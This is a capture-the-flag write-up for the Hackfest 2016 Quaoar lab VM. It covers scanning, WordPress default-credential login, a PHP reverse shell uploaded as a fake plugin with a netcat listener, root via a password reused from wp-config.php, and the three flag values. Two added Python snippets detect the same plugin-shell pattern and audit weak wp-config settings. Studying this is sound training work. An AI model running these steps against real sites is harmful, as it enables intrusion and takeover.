Another week, another CTF under my belt. Been doing a lot of CTF games the past months. This time I took some time off my schedule to play with the hackfest2016: Quaoar game. The difficulty level on this one is pretty low, which suited me fine this time around. It’s nice to have something to keep oneself occupied that doesn’t require much braining. Anyway, let's cut to the chase!
Welcome to Quaoar
This is a vulnerable machine I created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty : Very Easy
Here are the tools you can research to help you to own this machine: nmap, dirb / dirbuster / BurpSmartBuster, nikto, wpscan, hydra, Your Brain, Coffee, Google 🙂
Goals: This machine is intended to be doable by someone who is interested in learning computer security. There are 3 flags on this machine:
1. Get a shell
2. Get root access
3. There is a post exploitation flag on the box
Feedback: This is my first vulnerable machine, please give me feedback on how to improve! @ViperBlackSkull on Twitter, firstname.lastname@example.org. Special Thanks to madmantm for testing
You may have issues with VMware
This game did not require hunting for its IP address since it shows it already at the login prompt. Cutting directly to service discovery:
$ sudo nmap -p1-65535 -A -T4 -sS 192.168.110.14
Service scan revealed some interesting services:
In addition, the scan stumbled over the following:
| Service | Details |
|---------|---------|
| ssh     | OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) |
| http    | folder Hackers, robots.txt |
| pop3    | dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA |
| imap    | post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS |
This game seems propped with all sorts of services. They may be a complete hoax, such things happen. At this moment I do not know if these services will come in handy later on.
First flag: web
Most games want you to investigate the web part first. Visiting it in Firefox didn’t reveal anything interesting, neither in the HTML source nor in the images shown. Nmap did uncover a robots.txt file and I began looking closer into it:
| Disallowed | Hackers | Does not exist |
Not much to go by here, except WordPress. Trying dirb to push my luck:
$ dirb http://192.168.110.14 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w
This certainly took a while. After a couple of minutes I just killed dirb and looked at the results. There seems to be a CMS (Lepton CMS) lurking in the shadows on this target. Toyed with the paths found and it appeared the CMS does absolutely nothing. Decided to skip it and focus on WordPress instead.
Looking at WordPress installations is always fun. Time to bring out WpScan, adding in user enumeration for good measure:
$ sudo wpscan --url http://192.168.110.14/wordpress/ --enumerate u
| Path | Finding |
|------|---------|
| /readme.html | WordPress version 3.9.14 |
| /wp-content/uploads/ | Upload directory has directory listing enabled |
Also found these users:
Seems like a normal WordPress site set up in a hurry. Perhaps whoever was responsible set it up using default credentials (admin:admin)? It’s worth a try!
Fascinating results! It is time to get shell access. Now, there are a couple of routes to do this. I often land on creating a fake plugin.
As mentioned, I am going to create a fake plugin. First I bring out my trusty Shelly shell (your path may vary):
$ cp /usr/share/webshells/php/php-reverse-shell.php shelly.php
Then add a nice plugin wrapper around it:
<?php
/*
Plugin Name: Shelly
Plugin URI: http://localhost
Description: Bla Bla Bla
Author: Pingmoose
Version: 1.0.1
Author URI: http://localhost
*/
COPY CONTENTS OF shelly.php HERE
?>
Prepared Shelly with my IP address and listening port, then finally zipping the entire thing down:
$ zip shelly-plugin.zip shelly.php
Then installing the plugin, without activating it:
Setting up listener:
$ nc -lvp 4444
Activating the shell, visiting 192.168.110.14/wordpress/wp-content/plugins/shelly-plugin/shelly.php. Connection successfully picked up by listener and thus got shell:
Current shell is somewhat limited, spawning a new shell using a Python gem:
$ whoami
$ whereis python
$ python -c 'import pty; pty.spawn("/bin/bash")'
Looked around in the /home folder and found a flag hiding in the wpadmin folder (flag.txt). First flag: 2bafe61f03117ac66a73c3c514de796e.
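A defender's-side check for the route used above, added here as an example and not part of the original write-up: it scans Apache combined-format access-log lines for direct requests to PHP files under wp-content/plugins and rates a hit higher when the same client uploaded a plugin earlier in the log. The log lines, client IPs and timestamps are constructed for illustration.

```python
import re

# Constructed Apache combined-format log lines (not from the target). They
# replay the write-up's sequence: a plugin upload via wp-admin, then a direct
# GET to the new plugin's PHP file, which is what triggered the shell.
SAMPLE_LOG = """\
192.168.110.5 - - [01/Nov/2016:20:14:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.110.5 - - [01/Nov/2016:20:14:40 +0000] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 9182 "-" "Mozilla/5.0"
192.168.110.5 - - [01/Nov/2016:20:15:01 +0000] "GET /wordpress/wp-content/plugins/shelly-plugin/shelly.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.110.7 - - [01/Nov/2016:20:16:10 +0000] "GET /wordpress/wp-content/plugins/akismet/akismet.js HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# wp-admin endpoint that receives a zipped plugin upload
UPLOAD_PLUGIN = "/wp-admin/update.php?action=upload-plugin"
# a PHP file inside a plugin directory fetched directly, bypassing WordPress
PLUGIN_PHP = re.compile(r"/wp-content/plugins/[^/]+/[^?]+\.php$")


def parse(line):
    """Split one log line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """Return (ip, path, severity) for each direct request to a plugin PHP file.

    'high' when the same client uploaded a plugin earlier in the log, otherwise
    'medium' (some legitimate plugins expose PHP endpoints, so that tier needs
    a human look rather than an automatic block).
    """
    uploaders = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and UPLOAD_PLUGIN in rec["path"]:
            uploaders.add(rec["ip"])
        elif rec["method"] == "GET" and PLUGIN_PHP.search(rec["path"]):
            severity = "high" if rec["ip"] in uploaders else "medium"
            alerts.append((rec["ip"], rec["path"], severity))
    return alerts
```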
Second flag: chasing ROOT
Moving on trying to get ROOT access. First I tried to find if there were any scripts lying around which I could abuse:
$ cd /
$ find / -perm -4000 -user root 2> /dev/null
Nothing of interest found. Given that the WordPress installation looks like it was set up in a hurry, maybe passwords were reused as well? Best place is to look at /var/www/wordpress/wp-config.php first:
Hit gold. I think the hint couldn’t be any clearer. Password is literally rootpassword!
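An audit of the kind of wp-config.php that made this possible, added here as an example and not taken from the write-up: it pulls the define() constants out of a constructed wp-config.php excerpt, flags a short or word-based DB_PASSWORD and a root DB_USER, and reports whether DISALLOW_FILE_MODS and DISALLOW_FILE_EDIT (real WordPress constants that disable plugin uploads and the in-browser file editor) are set. The config contents, including the DB_USER value, are assumptions for the sample.

```python
import re

# Constructed wp-config.php excerpt, not the file from the target. The
# DB_PASSWORD value mirrors the write-up's finding; the DB_USER is assumed.
SAMPLE_WP_CONFIG = """\
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword');
define('DB_HOST', 'localhost');
define('WP_DEBUG', false);
"""

# Matches define('NAME', value); value may be a quoted string, bool or number
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*(.+?)\s*\)\s*;""")
WEAK_WORDS = ("password", "admin", "root", "wordpress", "123")


def parse_defines(text):
    """Return {CONSTANT: value}; strings are unquoted, other literals lowercased."""
    out = {}
    for name, raw in DEFINE_RE.findall(text):
        if raw[0] in "'\"" and raw[-1] == raw[0]:
            out[name] = raw[1:-1]
        else:
            out[name] = raw.lower()
    return out


def audit(text):
    """Return a list of findings for a wp-config.php; empty means nothing flagged."""
    cfg = parse_defines(text)
    findings = []
    pw = cfg.get("DB_PASSWORD", "")
    if len(pw) < 12 or any(w in pw.lower() for w in WEAK_WORDS):
        findings.append("DB_PASSWORD is short or built from a guessable word")
    if cfg.get("DB_USER") == "root":
        findings.append("DB_USER is root: a leaked DB password exposes every database")
    # Both constants are real WordPress settings; absent or false means the
    # admin UI can still upload plugins / edit plugin and theme files.
    if cfg.get("DISALLOW_FILE_MODS") != "true":
        findings.append("DISALLOW_FILE_MODS not true: plugins can be uploaded from wp-admin")
    if cfg.get("DISALLOW_FILE_EDIT") != "true":
        findings.append("DISALLOW_FILE_EDIT not true: in-browser plugin/theme editor enabled")
    return findings
```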
Navigated over to /root and found the flag: 8e3f9ec016e3598c5eec11fd3d73f6fb. According to the introduction text for this game there should be a third flag hidden somewhere.
Third flag: dancing like Indiana Jones
Time to do some braining. I am ROOT, thus I can do everything. Got a gut feeling the last flag is tucked away in plain text, perhaps in a comment somewhere. This step I did manually by starting to look in /etc. Found what I was looking for in /etc/cron.d/php5:
The third flag: d46795f84148fd338603d0d6a9dbf8de